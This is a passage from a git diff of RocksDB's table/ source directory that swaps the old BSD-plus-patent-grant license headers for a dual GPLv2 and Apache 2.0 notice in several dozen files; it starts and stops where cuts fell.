// Use of this source code is governed by a BSD-style license that can be diff --git a/table/block_prefix_index.cc b/table/block_prefix_index.cc index 10fcb057548..df37b5fc2b3 100644 --- a/table/block_prefix_index.cc +++ b/table/block_prefix_index.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "table/block_prefix_index.h" diff --git a/table/block_prefix_index.h b/table/block_prefix_index.h index d9c3b97e0a0..dd4282d17b8 100644 --- a/table/block_prefix_index.h +++ b/table/block_prefix_index.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/table/block_test.cc b/table/block_test.cc index bcc2d69e32f..f5c543975f4 100644 --- a/table/block_test.cc +++ b/table/block_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include #include diff --git a/table/bloom_block.cc b/table/bloom_block.cc index b496b3c2f98..61959030a22 100644 --- a/table/bloom_block.cc +++ b/table/bloom_block.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "table/bloom_block.h" diff --git a/table/bloom_block.h b/table/bloom_block.h index 40cef7b7188..9ff610badd4 100644 --- a/table/bloom_block.h +++ b/table/bloom_block.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/table/cleanable_test.cc b/table/cleanable_test.cc index 6a17d8a302f..f18c33b8399 100644 --- a/table/cleanable_test.cc +++ b/table/cleanable_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/table/cuckoo_table_builder.cc b/table/cuckoo_table_builder.cc index 457b2ef826a..e3ed314b36f 100644 --- a/table/cuckoo_table_builder.cc +++ b/table/cuckoo_table_builder.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "table/cuckoo_table_builder.h" diff --git a/table/cuckoo_table_builder.h b/table/cuckoo_table_builder.h index 47b95394216..3829541b39a 100644 --- a/table/cuckoo_table_builder.h +++ b/table/cuckoo_table_builder.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/table/cuckoo_table_builder_test.cc b/table/cuckoo_table_builder_test.cc index ad0d6570226..ec282b4b540 100644 --- a/table/cuckoo_table_builder_test.cc +++ b/table/cuckoo_table_builder_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/table/cuckoo_table_factory.cc b/table/cuckoo_table_factory.cc index 87107ee7fc3..2325bcf77c4 100644 --- a/table/cuckoo_table_factory.cc +++ b/table/cuckoo_table_factory.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "table/cuckoo_table_factory.h" diff --git a/table/cuckoo_table_factory.h b/table/cuckoo_table_factory.h index acf0da9d338..774dc3c3e80 100644 --- a/table/cuckoo_table_factory.h +++ b/table/cuckoo_table_factory.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/table/cuckoo_table_reader.cc b/table/cuckoo_table_reader.cc index 7a886229bb3..85670ad1daf 100644 --- a/table/cuckoo_table_reader.cc +++ b/table/cuckoo_table_reader.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/cuckoo_table_reader.h b/table/cuckoo_table_reader.h index 7241a7f05cb..f2b6d1a9cfe 100644 --- a/table/cuckoo_table_reader.h +++ b/table/cuckoo_table_reader.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/cuckoo_table_reader_test.cc b/table/cuckoo_table_reader_test.cc index e01417ea98b..7e131e56e31 100644 --- a/table/cuckoo_table_reader_test.cc +++ b/table/cuckoo_table_reader_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/table/filter_block.h b/table/filter_block.h index 57528e286c1..94136f659e1 100644 --- a/table/filter_block.h +++ b/table/filter_block.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/flush_block_policy.cc b/table/flush_block_policy.cc index f5757c6e72c..9a8dea4cb0c 100644 --- a/table/flush_block_policy.cc +++ b/table/flush_block_policy.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/options.h" #include "rocksdb/flush_block_policy.h" diff --git a/table/format.cc b/table/format.cc index 1ae45f18554..3e5a191bbf2 100644 --- a/table/format.cc +++ b/table/format.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/format.h b/table/format.h index aa0ebfbaf52..d89b1d312cf 100644 --- a/table/format.h +++ b/table/format.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/full_filter_bits_builder.h b/table/full_filter_bits_builder.h index c47a7475436..b3be7e897f0 100644 --- a/table/full_filter_bits_builder.h +++ b/table/full_filter_bits_builder.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/table/full_filter_block.cc b/table/full_filter_block.cc index 895c713b48d..5739494e8dd 100644 --- a/table/full_filter_block.cc +++ b/table/full_filter_block.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "table/full_filter_block.h" diff --git a/table/full_filter_block.h b/table/full_filter_block.h index 2121df79b18..be27c58b61d 100644 --- a/table/full_filter_block.h +++ b/table/full_filter_block.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/table/full_filter_block_test.cc b/table/full_filter_block_test.cc index 191a8243ffe..5fbda4c6f03 100644 --- a/table/full_filter_block_test.cc +++ b/table/full_filter_block_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "table/full_filter_block.h" diff --git a/table/get_context.cc b/table/get_context.cc index 060bd62b96d..2b49eba6abd 100644 --- a/table/get_context.cc +++ b/table/get_context.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "table/get_context.h" #include "db/merge_helper.h" diff --git a/table/get_context.h b/table/get_context.h index d58753346e6..ee8a3beab9f 100644 --- a/table/get_context.h +++ b/table/get_context.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/table/index_builder.cc b/table/index_builder.cc index a67b97895c0..cdf20aee920 100644 --- a/table/index_builder.cc +++ b/table/index_builder.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/index_builder.h b/table/index_builder.h index 43d484d7686..d591e0e533c 100644 --- a/table/index_builder.h +++ b/table/index_builder.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/internal_iterator.h b/table/internal_iterator.h index 62248007c99..2bfdb7d952a 100644 --- a/table/internal_iterator.h +++ b/table/internal_iterator.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/table/iter_heap.h b/table/iter_heap.h index 24ef64230b7..74c06caeaf8 100644 --- a/table/iter_heap.h +++ b/table/iter_heap.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/table/iterator.cc b/table/iterator.cc index b7b8dc1c1b3..23a84b59e0f 100644 --- a/table/iterator.cc +++ b/table/iterator.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/iterator_wrapper.h b/table/iterator_wrapper.h index 08be059f0da..f14acdb9bf6 100644 --- a/table/iterator_wrapper.h +++ b/table/iterator_wrapper.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/merger_test.cc b/table/merger_test.cc index 4b6cbf4bd6d..379a6f412d5 100644 --- a/table/merger_test.cc +++ b/table/merger_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/table/merging_iterator.cc b/table/merging_iterator.cc index e36f80ad3de..da30e1e6352 100644 --- a/table/merging_iterator.cc +++ b/table/merging_iterator.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/merging_iterator.h b/table/merging_iterator.h index 833de29cf98..48a28d86fd9 100644 --- a/table/merging_iterator.h +++ b/table/merging_iterator.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/meta_blocks.cc b/table/meta_blocks.cc index 229b7a7cfaa..5946e40fe0b 100644 --- a/table/meta_blocks.cc +++ b/table/meta_blocks.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "table/meta_blocks.h" #include diff --git a/table/meta_blocks.h b/table/meta_blocks.h index 5caba4c41f3..ddb685360d6 100644 --- a/table/meta_blocks.h +++ b/table/meta_blocks.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/table/mock_table.cc b/table/mock_table.cc index 25a5200ecfb..9de04d69c60 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -1,11 +1,9 @@ // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "table/mock_table.h" diff --git a/table/mock_table.h b/table/mock_table.h index 200de28780f..0583139c6bf 100644 --- a/table/mock_table.h +++ b/table/mock_table.h @@ -1,11 +1,9 @@ // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/table/partitioned_filter_block.cc b/table/partitioned_filter_block.cc index 138a7ed01ba..2b330039e50 100644 --- a/table/partitioned_filter_block.cc +++ b/table/partitioned_filter_block.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "table/partitioned_filter_block.h" diff --git a/table/partitioned_filter_block.h b/table/partitioned_filter_block.h index 97bbd1ea8c2..6c4a5d7b9d2 100644 --- a/table/partitioned_filter_block.h +++ b/table/partitioned_filter_block.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/table/partitioned_filter_block_test.cc b/table/partitioned_filter_block_test.cc index cbf8c493c98..a49143dae2f 100644 --- a/table/partitioned_filter_block_test.cc +++ b/table/partitioned_filter_block_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/table/persistent_cache_helper.cc b/table/persistent_cache_helper.cc index 1a8e83788aa..ec1cac0b9db 100644 --- a/table/persistent_cache_helper.cc +++ b/table/persistent_cache_helper.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "table/persistent_cache_helper.h" #include "table/block_based_table_reader.h" diff --git a/table/persistent_cache_helper.h b/table/persistent_cache_helper.h index 425a80c58c2..ac8ee0389bb 100644 --- a/table/persistent_cache_helper.h +++ b/table/persistent_cache_helper.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/table/persistent_cache_options.h b/table/persistent_cache_options.h index 9d349faa705..acd640369ad 100644 --- a/table/persistent_cache_options.h +++ b/table/persistent_cache_options.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/table/plain_table_builder.cc b/table/plain_table_builder.cc index e7ea40e0e4c..964804358a6 100644 --- a/table/plain_table_builder.cc +++ b/table/plain_table_builder.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "table/plain_table_builder.h" diff --git a/table/plain_table_builder.h b/table/plain_table_builder.h index a8759276eab..1d1f6c7586e 100644 --- a/table/plain_table_builder.h +++ b/table/plain_table_builder.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/table/plain_table_index.cc b/table/plain_table_index.cc index 3d84d124aa0..39a6b53d602 100644 --- a/table/plain_table_index.cc +++ b/table/plain_table_index.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/table/plain_table_index.h b/table/plain_table_index.h index 98ec505db27..2916be4192b 100644 --- a/table/plain_table_index.h +++ 